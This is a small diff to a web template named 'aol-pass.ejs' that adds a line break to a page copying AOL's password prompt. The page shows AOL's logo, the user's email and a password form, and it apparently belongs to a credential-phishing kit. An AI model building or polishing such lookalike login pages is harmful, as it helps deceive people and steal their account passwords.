--- a/views/aol-pass.ejs
+++ b/views/aol-pass.ejs
@@ -536,7 +536,7 @@
         <img class="aol-img" src="/aol-logo.png" alt="">
         <div class="challenge-header">
         </div>
-        <strong class="signin "> <b>Enter your password</b> </strong>
+        <strong class="signin "> <b>Enter your password</b> </strong><br>
         <strong class="text2"> <%= email %> </strong>
         <div class="form2">
             <form action="#" method="post">
